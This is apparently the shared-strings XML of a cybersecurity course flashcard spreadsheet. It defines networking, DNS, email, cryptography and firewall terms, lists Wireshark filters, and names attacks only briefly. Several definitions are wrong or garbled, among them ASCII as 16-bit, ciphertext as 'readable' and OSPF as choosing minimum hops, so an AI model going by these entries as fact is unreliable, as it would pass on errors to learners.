    <t>Part of a packet containing the information to help the receiver understand how to handle the packet.</t>
  </si>
  <si>
    <t>Header - Protocol:</t>
  </si>
  <si>
    <t>Specifies the name of the protocol in use</t>
  </si>
  <si>
    <t>Header - Version:</t>
  </si>
  <si>
    <t>Specifies the version of the protocol is in use</t>
  </si>
  <si>
    <t>Header - Destination Address:</t>
  </si>
  <si>
    <t>Specifies where the packet is sending to</t>
  </si>
  <si>
    <t>Header - Length of Packet:</t>
  </si>
  <si>
    <t>Tells the receiver how much data is in the packet payload.</t>
  </si>
  <si>
    <t>Ports:</t>
  </si>
  <si>
    <t>The access points for transmitting and recieving data.</t>
  </si>
  <si>
    <t>Internet Assigned Numbers Authority (IAN):</t>
  </si>
  <si>
    <t>The entity officially responsible for assigning port numbers for a designated purpose.</t>
  </si>
  <si>
    <t>Virtual Ports:</t>
  </si>
  <si>
    <t>An emulation of a hardware port</t>
  </si>
  <si>
    <t>Port Numbers:</t>
  </si>
  <si>
    <t>System Ports, Registered Ports, Dynamic/private ports</t>
  </si>
  <si>
    <t>System Ports:</t>
  </si>
  <si>
    <t>0 - 1023</t>
  </si>
  <si>
    <t>Registered Ports:</t>
  </si>
  <si>
    <t>1024 - 49151</t>
  </si>
  <si>
    <t>Dynamic Ports:</t>
  </si>
  <si>
    <t>49152 - 65535</t>
  </si>
  <si>
    <t>Source Port:</t>
  </si>
  <si>
    <t xml:space="preserve">Randomly generated dynamic port from ip range </t>
  </si>
  <si>
    <t>Destination Port:</t>
  </si>
  <si>
    <t>the TCP or UDP number used by a program on one side of communication to receive data from another program on the other end</t>
  </si>
  <si>
    <t>Open Systems Interconnection (OSI):</t>
  </si>
  <si>
    <t>Framework that conceptualizes the steps data takes during transmission, making it easier to communicate where issues exist.</t>
  </si>
  <si>
    <t>OSI Model:  1. Physical</t>
  </si>
  <si>
    <t>Responsible for transmission of Binary Data through a physical medium. It handles how data is physically encoded and decoded.</t>
  </si>
  <si>
    <t>OSI Model:  2. Data Link</t>
  </si>
  <si>
    <t xml:space="preserve">Establishes links between nodes. </t>
  </si>
  <si>
    <t>OSI Model: 3. Network</t>
  </si>
  <si>
    <t xml:space="preserve">Routes Data through physical networks using IP Addresses </t>
  </si>
  <si>
    <t>OSI Model:  4. Transport</t>
  </si>
  <si>
    <t>Responsible for transmitting data across the network. It puts data onto the network and assigns source and destination ports.</t>
  </si>
  <si>
    <t>OSI Model:  5. Session</t>
  </si>
  <si>
    <t>Manages Connections between ports on computers and handles data flow</t>
  </si>
  <si>
    <t>OSI Model: 6. Presentation:</t>
  </si>
  <si>
    <t>Translator for the network. It formats data to be presented in a readable format. For encryption and decryption reasons.</t>
  </si>
  <si>
    <t>OSI Model: 7. Application</t>
  </si>
  <si>
    <t>Responsible for representing data in a way the consuming application can understand.</t>
  </si>
  <si>
    <t>Encapsulation:</t>
  </si>
  <si>
    <t xml:space="preserve">The process of placing headers, and sometimes trailers, around the data to direct it to its destination. </t>
  </si>
  <si>
    <t>Decapsulation:</t>
  </si>
  <si>
    <t>The process of removing the headers, and sometimes the trailers, around the data to confirm the data has reached the destination.</t>
  </si>
  <si>
    <t>http.request.method == "POST"</t>
  </si>
  <si>
    <t>Command to search for any POST queries in Wireshark</t>
  </si>
  <si>
    <t>Enumeration:</t>
  </si>
  <si>
    <t>Is the process of gathering data for a specific network, usually for the purpose of finding ways to gain access into that network.</t>
  </si>
  <si>
    <t>8.3 Following Data Through Layers 2, 3, and 4</t>
  </si>
  <si>
    <t>Address Resolution Protocol (ARP):</t>
  </si>
  <si>
    <t>In Layer 2: Data Link, maps the MAC address to an IP address within the LAN using request and response process.</t>
  </si>
  <si>
    <t>ARP Cache:</t>
  </si>
  <si>
    <t>A collection of ARP entries (mostly dynamic) that are created when an IP address is resolved to a MAC address</t>
  </si>
  <si>
    <t>ARP Cache Timeout:</t>
  </si>
  <si>
    <t>Epirey of ARP Cache entries.</t>
  </si>
  <si>
    <t>Dynamic ARP Entries:</t>
  </si>
  <si>
    <t>Entries added to the ARP cache and can be changed with future ARP replies.</t>
  </si>
  <si>
    <t>arp.opcode == 2</t>
  </si>
  <si>
    <t>ARP Response Filter in Wireshark</t>
  </si>
  <si>
    <t>arp.opcode == 1</t>
  </si>
  <si>
    <t>ARP Request Filter in Wireshark</t>
  </si>
  <si>
    <t>Static ARP Entries:</t>
  </si>
  <si>
    <t>Sets permanent IP-to-MAC-address mappings in the ARP Cache table, and cannot be changed.</t>
  </si>
  <si>
    <t>PING (Packet-Inter-network Groper)</t>
  </si>
  <si>
    <t>A utility used to determine whether a host is operating and responding to echo requests.</t>
  </si>
  <si>
    <t>Internet Control Message Protocol (ICMP) echo request:</t>
  </si>
  <si>
    <t>Manually test for connectivity between network devices, and also to test for network delay and packet loss.</t>
  </si>
  <si>
    <t>Hops:</t>
  </si>
  <si>
    <t>Redirection of data transmission. list of all routers taken between 2 devices.</t>
  </si>
  <si>
    <t>Traceroute:</t>
  </si>
  <si>
    <t>Uses ICMP protocol, Shows the route taken between two systems across a network.</t>
  </si>
  <si>
    <t>Time-To-Live (TTL):</t>
  </si>
  <si>
    <t>Indicates how long a data packet can exist in a network.</t>
  </si>
  <si>
    <t>Transmission Control Protocol (TCP):</t>
  </si>
  <si>
    <t>Server must acknowledge it has recieved a packet from a client</t>
  </si>
  <si>
    <t>TCP Three Way Handshake:</t>
  </si>
  <si>
    <t>TCP process of establishing a reliable connection before sending data.</t>
  </si>
  <si>
    <t>User Datagram Protocol (UDP):</t>
  </si>
  <si>
    <t>Connectionless protocol. When it's not necessary for all data to reach the destination. UDP is less reliable but works more quickly.</t>
  </si>
  <si>
    <t>tcp.flags.syn ==1 &amp;&amp; tcp.flags.ack==0</t>
  </si>
  <si>
    <t>Wireshark TCP SYN filter for tcp handshake</t>
  </si>
  <si>
    <t>tcp.flags.fin ==1 &amp;&amp; tcp.flags.ack==0</t>
  </si>
  <si>
    <t>Wireshark TCP FIN filter for tcp handshake</t>
  </si>
  <si>
    <t>Nmap</t>
  </si>
  <si>
    <t>A free networking scanning tool available for Linux distributions.</t>
  </si>
  <si>
    <t>Nslookup</t>
  </si>
  <si>
    <t>Queries DNS records for a given domain name</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol (DHCP):</t>
  </si>
  <si>
    <t>A client server based protocol on your local network that is responsible for mangaing and assigning IP addresses. (is dynamic and uses UDP Ports 67 for Server and 68 for client. = application layer)</t>
  </si>
  <si>
    <t>9.1 IP and Protocols</t>
  </si>
  <si>
    <t>DHCP Lease:</t>
  </si>
  <si>
    <t>A temporary assignment of an IP address to a device on the network</t>
  </si>
  <si>
    <t>Wireshark - dhcp:</t>
  </si>
  <si>
    <t>filters for only DHCP protocols</t>
  </si>
  <si>
    <t>Wireshark - dhcp.option.dhcp == STEPNUMBER:</t>
  </si>
  <si>
    <t xml:space="preserve">filters for DHCP queries by their step </t>
  </si>
  <si>
    <t>Network Address Translation (NAT):</t>
  </si>
  <si>
    <t>A method of mapping a private IP address to a public IP address and vice versa.</t>
  </si>
  <si>
    <t>Gatway:</t>
  </si>
  <si>
    <t>The router connecting private and public networks.</t>
  </si>
  <si>
    <t>DHCP Attack:</t>
  </si>
  <si>
    <t xml:space="preserve">Flooding the network with DHCP discover requests deterring legitimate users from recieving a private address. </t>
  </si>
  <si>
    <t>DHCP Starvation:</t>
  </si>
  <si>
    <t xml:space="preserve">DoS attack impacting the availability of an asset. sending a flood of fake DHCP Discover messages with spoofed MAC addresses. </t>
  </si>
  <si>
    <t>Mitigation: Maxiumum Threshold</t>
  </si>
  <si>
    <t>The number of DHCP requests a server can accept per second.</t>
  </si>
  <si>
    <t>DHCP Spoofing:</t>
  </si>
  <si>
    <t>Occurs when an attacker attempts to respond to DHCP requests and trying to list itself (spoof) as the default gateway or DNS server, hence, initiating a man in the middle attack.</t>
  </si>
  <si>
    <t>DHCP Snooping:</t>
  </si>
  <si>
    <t>A process implemented on a network switch that inspects packets to confirm that they're legitimate DHCP offers, and blocks thos it determines to be unauthorized.</t>
  </si>
  <si>
    <t>Routing Schemes - Unicast:</t>
  </si>
  <si>
    <t>A single device delivers a message to another single, specific device.</t>
  </si>
  <si>
    <t>Routing Schemes - Broadcast:</t>
  </si>
  <si>
    <t>A single device broadcasts a message to all devices on the same network.</t>
  </si>
  <si>
    <t>Routing Schemes - Multicast:</t>
  </si>
  <si>
    <t>A device sends a message to devices that have express interest in recieving the message.</t>
  </si>
  <si>
    <t>Static Routing:</t>
  </si>
  <si>
    <t>Is the manual configuration of a network route, typically done by a network administrator.</t>
  </si>
  <si>
    <t>Dynamic Routing:</t>
  </si>
  <si>
    <t>Solves the fault tolerance issue by allowing the network to act on its own to avoid network blockages.</t>
  </si>
  <si>
    <t>Distance:</t>
  </si>
  <si>
    <t>Is the amount of devices or hops used to get the data from the source to the destination.,</t>
  </si>
  <si>
    <t>Routing Information Protocol (RIP):</t>
  </si>
  <si>
    <t>Oldest dynamic protocols that uses the hops count as its main criteria for choosing the route.</t>
  </si>
  <si>
    <t>Enhanced Interior Gateway Routing Protocol:</t>
  </si>
  <si>
    <t>A more efficient distance-vector routing protocol than RIP.</t>
  </si>
  <si>
    <t>Speed:</t>
  </si>
  <si>
    <t>The route is determineed by the time it takes to move from source to destination.</t>
  </si>
  <si>
    <t>Link-state routing protocols</t>
  </si>
  <si>
    <t>Dynamic routing protocols that use speed as criterria.</t>
  </si>
  <si>
    <t>Routing Protocols - Open Shortest Path First (OSPF):</t>
  </si>
  <si>
    <t>Link-state routing protocol, to find the best path for packets as they pass through a set of connected networks. Minimum hops.</t>
  </si>
  <si>
    <t>Wireless Technologies:</t>
  </si>
  <si>
    <t>Network that communicate data without wires through air and space.</t>
  </si>
  <si>
    <t>Wi-Fi</t>
  </si>
  <si>
    <t xml:space="preserve">Type of weireless technology that uses radio waves to provide wireless internet and network connections. </t>
  </si>
  <si>
    <t>Developped by IEEE to talk to each other in an agree-upon format.</t>
  </si>
  <si>
    <t>Wireless Access Points (WAP):</t>
  </si>
  <si>
    <t>A networking device that connects a wireless network to a wired network.</t>
  </si>
  <si>
    <t>Beacon:</t>
  </si>
  <si>
    <t>Broadcast signal sent out by WAPs.</t>
  </si>
  <si>
    <t>Basic Service Set Identifider (BSSID):</t>
  </si>
  <si>
    <t>Used for Waps to identify MAC address in a beacon signal.</t>
  </si>
  <si>
    <t>Service Set Identifier (SSID):</t>
  </si>
  <si>
    <t>Names listed for the WAPs.</t>
  </si>
  <si>
    <t>Wired Equivalent Privacy (WEP):</t>
  </si>
  <si>
    <t>The first kind of wifi technoilogy, security by encryption to provide protection and privacy of wireless traffic.</t>
  </si>
  <si>
    <t>WIFI Protected Access (WPA):</t>
  </si>
  <si>
    <t xml:space="preserve">Vulnerabilites in WEP, created a new sophisticated wireless security protocol. </t>
  </si>
  <si>
    <t>WPA 2:</t>
  </si>
  <si>
    <t>An even more secure wireless protocol and is used on most WAPs today.</t>
  </si>
  <si>
    <t>Free wireless decryption tool to decrypt WEP-encrypted wireless traffic.</t>
  </si>
  <si>
    <t>Cybercriminla Tactics - Wardriving:</t>
  </si>
  <si>
    <t>Driving around an area with a computer and wireless antenna to find wireless LANs that may be vulnerable.</t>
  </si>
  <si>
    <t>Cybercriminla Tactics - Warhacking:</t>
  </si>
  <si>
    <t>Marking Locations with chalk sos ites can be exploited at thes access points at a later time.</t>
  </si>
  <si>
    <t>Cybercriminla Tactics - WarFlying:</t>
  </si>
  <si>
    <t>Using drones to find vulnerable access points.</t>
  </si>
  <si>
    <t>DNS zone file:</t>
  </si>
  <si>
    <t>An actual file containing all the DNS records for a particular domain.</t>
  </si>
  <si>
    <t>9.2 Email Networks and Security</t>
  </si>
  <si>
    <t>DNS Records - A</t>
  </si>
  <si>
    <t>Translates a domain into an IP Address</t>
  </si>
  <si>
    <t>DNS Records - PTR</t>
  </si>
  <si>
    <t xml:space="preserve">The opposite of an A record, translates the IP address into a domain. </t>
  </si>
  <si>
    <t>DNS Records - CNAME</t>
  </si>
  <si>
    <t>An alias record used to point one domain to another domain</t>
  </si>
  <si>
    <t>DNS Records - SOA</t>
  </si>
  <si>
    <t>Contains administrative details about a domain.</t>
  </si>
  <si>
    <t>DNS Records - NS (Authotative Name Server)</t>
  </si>
  <si>
    <t xml:space="preserve">Indicates which server contains actual DNS records for a domain. </t>
  </si>
  <si>
    <t>Domain:</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Can have mmultiple NS records for redundancy. </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>ns1.dns.com</t>
    </r>
    <r>
      <rPr/>
      <t xml:space="preserve"> and </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>ns2.dns.com</t>
    </r>
  </si>
  <si>
    <t>Subdomain:</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Used to point subdomains to name servers. </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>marketing.widgets.com</t>
    </r>
    <r>
      <rPr/>
      <t xml:space="preserve"> &gt; </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>ns3.dns.com</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> MX (Mail Exchange) Record:</t>
  </si>
  <si>
    <t>Directs emails to a specific mail server for a domain.</t>
  </si>
  <si>
    <t xml:space="preserve"> MX Record - Preferences:</t>
  </si>
  <si>
    <t>Preferences of MX record for setting the primary and secondary mail servers.</t>
  </si>
  <si>
    <t>Lowest Preference Number:</t>
  </si>
  <si>
    <t>Highest priority order for DNS server is lowest number.</t>
  </si>
  <si>
    <t>TXT (text) Record:</t>
  </si>
  <si>
    <t>Created to include human-readable notes, such as associated company name. These also include computer-readable data.</t>
  </si>
  <si>
    <t>TXT Record - SPF Record:</t>
  </si>
  <si>
    <t>Indicates which mail servers are allowed to send emails on behalf of a domain. Prevents spam, phishing, and email spoofing, by detecting emails that may have a forged sender mail.</t>
  </si>
  <si>
    <t>nslookup:</t>
  </si>
  <si>
    <t>CLI tool allowing us to eaily look up the DNS records for a Domain.</t>
  </si>
  <si>
    <t>POP3 (Post Office Protocol):</t>
  </si>
  <si>
    <t>Uses port 110 in Layer 7, only supports one-way email synchronization, only allowing users to download emails from a server to a client.</t>
  </si>
  <si>
    <t>IMAP (Internet Message Access Protocol):</t>
  </si>
  <si>
    <t>Uses port 143 in Layer 7, IMAP retains the message on the server after downloading to client.</t>
  </si>
  <si>
    <t>Email Header:</t>
  </si>
  <si>
    <t>The part of an email that contains information about the mail sender, receiver, and subject</t>
  </si>
  <si>
    <t>Email Header - From:</t>
  </si>
  <si>
    <t>The email of sender</t>
  </si>
  <si>
    <t>Email Header - To:</t>
  </si>
  <si>
    <t>The destination email of reciever.</t>
  </si>
  <si>
    <t>Email Header - Subject:</t>
  </si>
  <si>
    <t>Subject of email</t>
  </si>
  <si>
    <t>Email Header - Body:</t>
  </si>
  <si>
    <t>Body content of email containing text and images.</t>
  </si>
  <si>
    <t>Email Header - Date/Time:</t>
  </si>
  <si>
    <t>Date and time variables stamped on email.</t>
  </si>
  <si>
    <t>Email Header - "x":</t>
  </si>
  <si>
    <t>Signifies an extention of the standard headers. Often used for custom apps.</t>
  </si>
  <si>
    <t>Issue - Uniencrypted Channels:</t>
  </si>
  <si>
    <t>Almost always not encrypted, and sent across multiple mail servers before reaching destination, opennign up opportunity for risk.</t>
  </si>
  <si>
    <t>PGP:</t>
  </si>
  <si>
    <t>Pretty Good Privacy, uses the public key system in which every user has a unique encryption key known publicly and a private key that only they know</t>
  </si>
  <si>
    <t>S/MIME:</t>
  </si>
  <si>
    <t>Secure / Multipurpose Internet Mail Extentions, improves email security by encrypting messages and adding a digital signature.</t>
  </si>
  <si>
    <t>Email Spoofing:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">When an email is designed to trick the reciever into believing it is coming from. Detected using </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>FROM</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>RECIEVED-SPF</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>RECIEVED</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> email headers. </t>
    </r>
  </si>
  <si>
    <t>Recieved-SPF:</t>
  </si>
  <si>
    <t>Email Header that displays the results of validating the SPF record.</t>
  </si>
  <si>
    <t>ARIN/RDAP tool:</t>
  </si>
  <si>
    <t>American Registry for Internet Numbers, Used to collect additoinal information regarding the sender IP.</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>The art and science of keeping information secure through the use of math concepts and techniques.</t>
  </si>
  <si>
    <t>10.1 Intro to Cryptography</t>
  </si>
  <si>
    <t>Cipher</t>
  </si>
  <si>
    <t>A method of designing secret or hidden messages.</t>
  </si>
  <si>
    <t>Ceasar Cipher</t>
  </si>
  <si>
    <t>Encryption method used by a roman general to take plaintext messages, and converts it to an unreadale ciphertext message.</t>
  </si>
  <si>
    <t>Enigma Machine</t>
  </si>
  <si>
    <t>a cipher device used by Nazi Germany's military command to encode strategic messages before and during World War II.</t>
  </si>
  <si>
    <t>Alan Turing</t>
  </si>
  <si>
    <t>Individual who  was famous for decoding the encryption of German Enigma machines during the second world war.</t>
  </si>
  <si>
    <t>Plaintext:</t>
  </si>
  <si>
    <t>Information in human-readable form.</t>
  </si>
  <si>
    <t>Ciphertext:</t>
  </si>
  <si>
    <t>Plaintext message that has been encypted into a readable form</t>
  </si>
  <si>
    <t>Encryption:</t>
  </si>
  <si>
    <t>The process of converting plaintext to ciphertext.</t>
  </si>
  <si>
    <t>Decryption:</t>
  </si>
  <si>
    <t>The process of converting ciphertext to plaintext.</t>
  </si>
  <si>
    <t>Cipher:</t>
  </si>
  <si>
    <t>A method of performing encryption or decryption.</t>
  </si>
  <si>
    <t>Key:</t>
  </si>
  <si>
    <t>A parameter specifying how plaintext is converted to ciphertext and vice versa.</t>
  </si>
  <si>
    <t>Ceaesar Cipher:</t>
  </si>
  <si>
    <t>A type of cipher that shifts the letters in the alphabet by a fixed number</t>
  </si>
  <si>
    <t>Enigma Cipher:</t>
  </si>
  <si>
    <t>Cipher  used by Nazi Germany's military command to encode strategic messages</t>
  </si>
  <si>
    <t>Encoding:</t>
  </si>
  <si>
    <t xml:space="preserve"> the process of putting a sequence of characters (letters, numbers, punctuation, and certain symbols) into a specialized format for efficient transmission or storage.</t>
  </si>
  <si>
    <t>Binary:</t>
  </si>
  <si>
    <t>ASCII:</t>
  </si>
  <si>
    <t>Converting the characters in terms of the 16-bit format</t>
  </si>
  <si>
    <t>HEX:</t>
  </si>
  <si>
    <t>Octal:</t>
  </si>
  <si>
    <t>Applies a priciple like Hex, but uses digits 0 - 7.</t>
  </si>
  <si>
    <t>Decimal System:</t>
  </si>
  <si>
    <t>A little more limited and consists of characters 1,2,3,4,5,6,7,8,9,0</t>
  </si>
  <si>
    <t>PAIN Goals</t>
  </si>
  <si>
    <t>Privacy, Authentication, Integrity, Non-repudiation</t>
  </si>
  <si>
    <t>PAIN Goals: Privacy</t>
  </si>
  <si>
    <t>Keeps data secure from unauthorized parties</t>
  </si>
  <si>
    <t>Data in motion:</t>
  </si>
  <si>
    <t>Data moving between devices</t>
  </si>
  <si>
    <t xml:space="preserve">Data at Rest: </t>
  </si>
  <si>
    <t>Static data, such as that stored on a hard drive or in a database.</t>
  </si>
  <si>
    <t>PAIN Goals: Authentication</t>
  </si>
  <si>
    <t>Used to confirm the identities of the sender and reciever of data.</t>
  </si>
  <si>
    <t>PAIN Goals: Integrity:</t>
  </si>
  <si>
    <t>Ensure a message ins't altered between when it's sent and when it's recieved.</t>
  </si>
  <si>
    <t>PAIN Goals: Non Repudiation:</t>
  </si>
  <si>
    <t>Prevents the original sender from denying they were the sender.</t>
  </si>
  <si>
    <t>Algorithms:</t>
  </si>
  <si>
    <t>Mathematical instructions that ciphers use for encryption.</t>
  </si>
  <si>
    <t xml:space="preserve">Stream Ciphers: </t>
  </si>
  <si>
    <t>Apply their algorithm one bit (character) at  at a time.</t>
  </si>
  <si>
    <t>Substituion Cipher:</t>
  </si>
  <si>
    <t>Stream cipher, which substites out values for new values of input message.</t>
  </si>
  <si>
    <t>Block Cipher:</t>
  </si>
  <si>
    <t>Apply their algorith to chunks of characters.</t>
  </si>
  <si>
    <t>Transpositioned Cipher:</t>
  </si>
  <si>
    <t>Block Cipher, which breaks an input message into equal-sized blocks and rearranges the letters of each block.</t>
  </si>
  <si>
    <t>Key Space:</t>
  </si>
  <si>
    <t>Possible range of numbers that can be used as a key in each algorithm.</t>
  </si>
  <si>
    <t>Bit Size:</t>
  </si>
  <si>
    <t>Key space is defined by the number of binary bits used in the key.</t>
  </si>
  <si>
    <t>Modern Symmetric Key Algorithms:</t>
  </si>
  <si>
    <t>Use algorithms that are secure and fast.</t>
  </si>
  <si>
    <t>Symmetric Key Algorithms (SKA):</t>
  </si>
  <si>
    <t xml:space="preserve">Uses a single, shared key to encrypt and decrypt a message. This shared key needs to remain private. </t>
  </si>
  <si>
    <t>SKA - Data Encryption Standard (DES):</t>
  </si>
  <si>
    <t>56-bit algorithm published by the United States in 1977.</t>
  </si>
  <si>
    <t>SKA - Triple DES:</t>
  </si>
  <si>
    <t>More secure DES made from the previopus flaws.</t>
  </si>
  <si>
    <t>SKA - Advanced Encryption Standard (AES):</t>
  </si>
  <si>
    <t>A symmetric block cipher chosen by the U.S. government to protect classified information.</t>
  </si>
  <si>
    <t>Count of Symmetric Keys:</t>
  </si>
  <si>
    <t>(N * (N - 1)) / 2, eg 1000 employees would be (1000*999)/2 = 499,500</t>
  </si>
  <si>
    <t>10.2 Asymmetric Encryption and Hashing</t>
  </si>
  <si>
    <t xml:space="preserve">Asymetric Key : </t>
  </si>
  <si>
    <t xml:space="preserve"> Uses a  public and private for encryption and decryption respectively, enabling secure communication and digital signatures.</t>
  </si>
  <si>
    <t>Count of Asymmetric Keys:</t>
  </si>
  <si>
    <t>N * 2, eg 1000 * 2 = 2000</t>
  </si>
  <si>
    <t>RSA:</t>
  </si>
  <si>
    <t>Algorithm used in Asymmetric encryption. Employs the complexity of factoring large numbers.</t>
  </si>
  <si>
    <t>Public Key:</t>
  </si>
  <si>
    <t>Used to encrypt a message or check the legitimacy of a digital signature and is accessible to the public.</t>
  </si>
  <si>
    <t>GNU Privacy Guard (GPG):</t>
  </si>
  <si>
    <t>MD5 Hashing:</t>
  </si>
  <si>
    <t>A cryptographic method used to verify the integrity of data.</t>
  </si>
  <si>
    <t>SHA:</t>
  </si>
  <si>
    <t>Secure Hashing Algorithms, and includes successors SHA1 and 2</t>
  </si>
  <si>
    <t>SHA2:</t>
  </si>
  <si>
    <t>Has variations with different security stregths: SHA-256 and SHA-512.</t>
  </si>
  <si>
    <t>MD:</t>
  </si>
  <si>
    <t>Message Digest and has several values: MD2, MD4, and MD5</t>
  </si>
  <si>
    <t>LM and NTLM:</t>
  </si>
  <si>
    <t>Windows Hashes</t>
  </si>
  <si>
    <t>Digital Signature:</t>
  </si>
  <si>
    <t>A mathematical scheme used to verify the authenticity of digital dat.</t>
  </si>
  <si>
    <t>Detached Signature:</t>
  </si>
  <si>
    <t>The message and the signature are sent seperately.</t>
  </si>
  <si>
    <t>All at Once:</t>
  </si>
  <si>
    <t>A signature appended to an encrypted message.</t>
  </si>
  <si>
    <t>Clearsigned:</t>
  </si>
  <si>
    <t>A signature appended to an unencrypted message.</t>
  </si>
  <si>
    <t>Signed Hash:</t>
  </si>
  <si>
    <t>Instead of signing a message, a hash is created first and the hash is signed for verification.</t>
  </si>
  <si>
    <t>Disk Encryption:</t>
  </si>
  <si>
    <t>The process of securing portable devices and workstations so content is not readable unless a key is obtained.,</t>
  </si>
  <si>
    <t>10.3 Applied Cryptography and Attacks</t>
  </si>
  <si>
    <t>BitLocker:</t>
  </si>
  <si>
    <t>Windows symmetric disk encryption program</t>
  </si>
  <si>
    <t>FileVault:</t>
  </si>
  <si>
    <t>MacOS symmetric disk encryption program.</t>
  </si>
  <si>
    <t>Secure Socket Layer (SSL):</t>
  </si>
  <si>
    <t>A protocol designed to encrypt web traffic.</t>
  </si>
  <si>
    <t>Forensics Examiner:</t>
  </si>
  <si>
    <t>A cybersecurity professional who captures and investigates digital evidence from computers, cell phones, and other devices containing digital data. They additionally make a hash of the original evidence to provide integrity of evidence.</t>
  </si>
  <si>
    <t>Steganography:</t>
  </si>
  <si>
    <t>The Cryptographic technique of placing hidden messages within files, images, or videos.</t>
  </si>
  <si>
    <t>SSL Certificates:</t>
  </si>
  <si>
    <t>Small data files that contain data elements including public key and cryptographic signature to secure TLS connections security between the browser and the web server.</t>
  </si>
  <si>
    <t>Certificate Authority (CA):</t>
  </si>
  <si>
    <t>Organization responsible for issuing SSL Certificates.</t>
  </si>
  <si>
    <t>x.509 certificate:</t>
  </si>
  <si>
    <t>Current standard for SSL certificates for securing online communications.</t>
  </si>
  <si>
    <t>Certificate Signing Request (CSR):</t>
  </si>
  <si>
    <t>A block of data that is created on the web server where the SSL certificate will eventually be installed.</t>
  </si>
  <si>
    <t>Root Certificate Authorities:</t>
  </si>
  <si>
    <t>List of CAs trusted by your browser.</t>
  </si>
  <si>
    <t>Intermediate Certificate Authorities:</t>
  </si>
  <si>
    <t xml:space="preserve">Issue Certificates and report up to a root certificate authority. </t>
  </si>
  <si>
    <t>Statistical Attack:</t>
  </si>
  <si>
    <t xml:space="preserve">Exploits Weakness in cryptographic algorithms by attempting to deteremine if the "random" values produced are actually predictable. </t>
  </si>
  <si>
    <t>Brute Force Attack:</t>
  </si>
  <si>
    <t>Attack featuring an attacker using many password or user and password combinations until one eventually works.</t>
  </si>
  <si>
    <t>Birthday Attack:</t>
  </si>
  <si>
    <t>exploit the probability that two separate plaintexts that use the same hash algorithm will produce the same ciphertext.</t>
  </si>
  <si>
    <t>Birthday Problem:</t>
  </si>
  <si>
    <t>Probability theory that states that the probability of two people in a sample is higher than expected if the number of sample is larger than a smaller sample.</t>
  </si>
  <si>
    <t>Frequency Analysis:</t>
  </si>
  <si>
    <t>A method for cracking substitution algorithms.</t>
  </si>
  <si>
    <t>Replay Attack:</t>
  </si>
  <si>
    <t xml:space="preserve">Attacker intercepts an encrypted message and replays it to the receiving party to get access. </t>
  </si>
  <si>
    <t>Rainbow Tables:</t>
  </si>
  <si>
    <t>Resources that contain precomputed hashes with the associated plaintext passwords.</t>
  </si>
  <si>
    <t>Salting:</t>
  </si>
  <si>
    <t xml:space="preserve">A cryptographic method of combining salt (a random value) with the plaintext into the hash function.  </t>
  </si>
  <si>
    <t>Hashcat:</t>
  </si>
  <si>
    <t xml:space="preserve">A command-line tool that can automate the cracking of hashes. </t>
  </si>
  <si>
    <t>The process of taking physical and software preventative measures to protect the underlying networking infrastructure from unauthorized access, misuse, malfunction, modification, destruction, or improper disclosure, thereby creating a secure platform for computers, users and programs to perform their permitted critical functions within a secure environment.</t>
  </si>
  <si>
    <t>11.1 Introduction to Firewalls and Network Security</t>
  </si>
  <si>
    <t>Firewalls:</t>
  </si>
  <si>
    <t>Technical security control that distinguish between trusted and untrusted network traffic and network connections.</t>
  </si>
  <si>
    <t>Defense in Depth:</t>
  </si>
  <si>
    <t>The use of multiple controls arranged in series to provide several consecutive controls to protect an asset.</t>
  </si>
  <si>
    <t>MAC firewalls:</t>
  </si>
  <si>
    <t xml:space="preserve">Operate at Layer 2 of the OSI and filter based on source and destination MAC addresses. </t>
  </si>
  <si>
    <t>Packet-Filtering Firewalls (Stateless):</t>
  </si>
  <si>
    <t>Operate at Layer 3 and Layer 4 of the OSI model and statically evaluate the contents of packets and do not keep track of the state of a network connection (aka stateless).</t>
  </si>
  <si>
    <t>Packet-Filtering Firewalls (Stateful):</t>
  </si>
  <si>
    <t xml:space="preserve">Operate at Layer 3 and Layer 4 of the OSI model and determines if a packet is:
Trying to establish a new connection, known as a new state. Part of an existing connection, known as an established state. Is neither a new nor an existing connection, known as a rogue packet. </t>
  </si>
  <si>
    <t>Circuit-Level Firewalls:</t>
  </si>
  <si>
    <t xml:space="preserve">Operate at Layer 5 of the OSI model. Circuit-level gateways work by verifying the three-way TCP handshake. </t>
  </si>
  <si>
    <t>Application (Proxy) Firewalls:</t>
  </si>
  <si>
    <t>Operate at Layer 3 through Layer 7 of the OSI model. They inspect the actual contents of the packet, including authentication and encryption components.</t>
  </si>
  <si>
    <t>Uncomplicated Firewall (UFW):</t>
  </si>
  <si>
    <t>Host-based:</t>
  </si>
  <si>
    <t xml:space="preserve">UFW is most commonly used on hosts. 
</t>
  </si>
  <si>
    <t>Logging:</t>
  </si>
  <si>
    <t xml:space="preserve">UFW has the ability to generate multi-level logs, providing great insight into attacks.
</t>
  </si>
  <si>
    <t>Remote management:</t>
  </si>
  <si>
    <t xml:space="preserve">Firewalls can be remotely managed. For example, through SSH via port 22. (Security concern?)
</t>
  </si>
  <si>
    <t>Rate-limiting:</t>
  </si>
  <si>
    <t>Supports rate-limited connections to protect from brute force attacks.</t>
  </si>
  <si>
